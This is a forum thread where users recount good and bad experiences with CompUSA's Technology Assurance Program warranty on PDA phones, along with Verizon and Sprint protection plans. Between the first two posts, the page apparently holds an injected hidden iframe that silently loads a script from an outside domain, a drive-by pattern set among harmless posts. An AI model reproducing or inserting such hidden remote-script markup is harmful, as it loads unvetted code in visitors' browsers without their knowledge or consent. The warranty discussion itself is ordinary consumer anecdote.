+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

Can I get an extended warranty protection plan for my phone?

CompUSA offers a very good protection plan that you can buy from them (within 10 days of purchase), even if you don't buy your PocketPC Phone from them. The plan is called PDA TAP (Technology Assurance Program) and it will cover the device for 2 years for defect or damage (please read the details for yourself and don't rely on my description here as a legal explanation). The program is $99 for 2 years and is overlapping with the manufacturers warranty. The other nice feature is that they will credit what you originally spent on the PDA towards a new model within the 2 years. I'm not sure how that works, exactly, but many people have reported doing it. This must be done in the stores.

UPDATE!!! I bought a TAP for a pdaPhone I purchased from Amazon.com, and had a lot of trouble when I went to use it. When I tried to get them to replace a Pocket PC Phone Edition with a broken display, they pulled a loophole because the SKU was different and wouldn't do what the plan language said. The plan details say nothing about SKU numbers, just that they will replace it with a unit of similar functionality. They would only give me a gift card for what I paid for the phone. This would have meant that I would have had to buy a new one without a plan at several hundred dollars difference. They also refused to give me a full refund for the TAP, even though they were admitting that they couldn't honor it. Some people have had good luck with it... not me. Probably varys with how customer friendly a given store is.

In the end I got a gift card from them for what the receipt from Amazon showed as the purchase price... $449. They were not aware of the $200 in rebates that Amazon provided, so in the end this was good. BUT, BE AWARE ... they do not do what the TAP contract says.... they give you a gift card for the pdaPhone purchase price. As long as you keep that in mind, this can be a good insurance policy.
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

They have totally changed the PDA replacement plan at CompUSA. DO NOT BE SUCKERED BY THEM. Here's my story.

I bought a TREO 270 PDA/PHONE (palm OS) from them for $499 (with T-mobile 1 yr contract) back in September 2002. I aslo bought their $79 TAP warranty plan. The sales rep said that they would replace it with a brand new one, if mine broke for any reason, or give me my original price toward a new one. THIS IS ABSOLUTELY FALSE!

Needless to say when I went to compUSA with my TREO when the screen completely stopped responding to touch...they said no problem to replacing it. However, compUSA had discountinued the Treo 270 so they couldnt give me another.

The TAP warranty now says "1 time replacement of original product with a product of equal or simliar features, specifications, and functionality."

The only item that they had in stock that was a PDA/PHONE combo was the T-mobile Pocket PC phone Edition.

Now back to the warranty; No where does it say, you get reimbursed for the original purchase price as the original salesman had told me.

Here is the real kicker. Since this is a discontinued product it has a clearance price of $278 in their system. So they just wanted to give me $278 credit toward another phone. However, their TAP warranty documentation doesnt say "reimburse customer at current depreciated value.." These guys were really trying to screw me it seems.

Though I was disgusted by now, I thought fine, ill use the $278 credit toward their only T-mobile PDA which was the Pocket PC which had a display price of $599. So when they went to ring me up, they wanted to charge me $750 for the T-mobile pocket pc phone because I wasn't activating it in the store. I told them I already had signed a 1 year contract at compUSA last time when I bought their TREO 270!! They said, sorry we cannot give you the $599 price if you dont sign ANOTHER 1 year contract. At this point I was fuming mad. After arguing with the manager for 5 minutes to no avail, I took my broken treo and left. These people are SO UN-customer oriented AFTER the sale it is sickening.

I refuse to ever shop at CompUSA again (even if something is on sale). I complained to compUSA corporate about this and I am waiting to see how this is resolved.

I guess the moral of the story is, do not trust compUSA or their sales staff. They will always try to wiggle out of something if they are not making profit!

Just my two cents.

Editor and Site Administrator Convergent's Avatar

Same here

My story is identical, except I have the T-Mobile PPCPC, and they wouldn't replace it. I can still use it with the damaged display so I decided to wait for my 1 yr plan w/T-Mobile to end, and get a newer phone then. I spent hours with local and regional to no avail. Let me know if corporate helps.
    Mike - Been Converged?

I got a plan called "Peripheral Carry In Replacement Plan" at CompUSA. I'm looking at the brochure that I stapled my last reciept to.... Ah yes, part of the "TAP - Technology Assurance Program". I've used it twice because I keep dropping and cracking the screen on my T-Mobile PPC PE. Neither time did the store give me any grief. It only cost $54.11 after Texas Sales Tax.

Of course they still had the exact same phone in stock. And the phone did ring up in their register as "$730.68" store credit even though the shelf price was $549.99.
    The Store was:
    CompUSA #139, phone: 817-569-0130
    4465 Bryant Irving Road
    Fort Worth, TX 76132

Maybe I just got lucky and was helped by the right people at the right counter at the right store. The Brochure does have A LOT of small print. 13 pages of it in very tiny font. I was sold the plan by a CompUSA salesperson who said "As long as you can physically bring the phone, or what's left of it, back to the store, you can get a replacement or store credit no questions asked." I repeated this phrase when I approched the counter the 2 times I did replace the phone. He also used the phrase "Carry-In Replacement" plan which there is a couple of paragraphs dedicated to in the small print brochure. Looking at my receipt again, It says "TAP 2YR C/I RPL CE 49.99", the unofficial transaltion: "2 year Carry In Replacement". CE means Windows CE device? I'm guessing.

Considering the trouble others have had with CompUSA, Any one interested in this plan from CompUSA I recommend picking up the brochure 1st and reading it. Then if you decide to buy, go ask those hard hitting questions of the sales people and get direct answers. You know, the old "Let's say, my wife runs of the phone with a car. I can just bring in my reciept and the little shards of left over phone and I get a brand new phone just like it?" kind of questions. I was very blunt when I bought the plan the first time and asked "what If I drop it and it stops working or the screen cracks?". When they said yes to that, I was sold. I didn't even buy the phone at that store. I bought if from the T-Mobile Web Site.

For people that did have trouble with CompUSA, I would get my reciept and call 2 or 3 different CompUSA's in your city until you get an answer you like. Don't let each store know that you've called any other CompUSA's. Let's face it, some retail managers just have a bug up their a$$ and decide before they even see you that they are going to give you a hard time.

-Good Luck!
    -John D.

Lightbulb More Info

Verizon does offer extended protection on an ongoing basis. One for I believe 3-5 dollars a month covers the unit against any type of damage and they will replace the phone. Well worth the money..good luck.
    Cobra

Extended warranty

Bought a$ 4/month insurance policy from Sprint for my Treo 600 : covers lost, stolen or damaged, w/$ 35 deductable.

Re: More Info

Originally posted by prott1
    Verizon does offer extended protection on an ongoing basis. One for I believe 3-5 dollars a month covers the unit against any type of damage and they will replace the phone. Well worth the money..good luck.

Fwiw, I had the recent need to test the Verizon extended warranty. It is $4/month w/ $50 deductible, and I'd had my new 7135 for two days when I managed to drop it in a pool. I called the warranty line on Friday morning and the replacement 7135 arrived via Fed Ex by noon on Monday. No hassles, all very professional.

Cheers,

John
    John

We had a similar problem with CompUSA, and we no longer shop there. We purchased a Kyocera 6035 on a close-out, and they talked my wife into spending $75 on a PDA protection plan. When the phone died, they wouldn't honor the "replacement" offer, and the $100 that they would offer had to be applied to their paltry selection of PDA phones.

Sprint offers a great plan, and we carry that on our I-500s.

compusa TAP

so here is the new deal with cell phone / PDA phone TAP (Technology Assurance Program). If you activate a cell phone in store most times there is a discount however you have to buy the TAP that covers the value of the phone sans the discounts. so for example a $99 KRZR is $299 before discounts, so you buy the $249 to $349 TAP. if ANYTHING happens in those 2 years you bring it into a store and you will get either the same phone if it is still made, OR (refering back to my example) 299$ towards any new phone, HOWEVER!!! YOU HAVE TO BUY THE PHONE AT RETAIL PRICE IF YOU ARE NOT SIGNING A NEW CONTRACT! so buy another 299$ phone and stop whining. if you want a phone that AT RETAIL costs more than $299 you have to pay the difference. Now with PDA's its a bit different. PDA Phones are whats called "express exchange" when they break you go to this compusa website and fill out the form and they mail you a new one with prepaid postage to take back the broken one. ONLY IF THEY CANT REPLACE IT, will they give you an email that tells you to print off the email and take the PDA Phone in store to get them to exchange it. Then it is just like a cell phone replacement. Finally comes the "bout somewhere else and get TAP on it" part of this reply. YOU CAN BUY STUFF ELSEWHERE AND GET TAP ON IT!!! HOWEVER, there HAS TO BE a CompUSA SKU number for that object that you are getting TAP on. so when you go in to get the TAP take your sales reciete and a printout of what the retail cost is after activation if your doing it on a cell phone. because they will charge you TAP for the retail price of the phone. when this happens, They RETURN the phone (for example) to the store at the retail price to store credit, you then REBUY the phone at retail price with the store credit and pay the difference since TAP is on the ticket. that way it is all on one receite. then its like you bought it at compusa, just do what it says in the first example. OH ALSO! if there is no instore SKU YOU CAN NOT GET TAP ON IT. because the store has NO way of running the item thru their registers since it isn't a product that CompUSA sells.

TAP=AMAZING!!! i got a treo 680, TAP'ed it out for a Blackjack, which i TAP'ed out for a 8525, which i plan on TAP'ing out for a iPhone when we get those in store!!!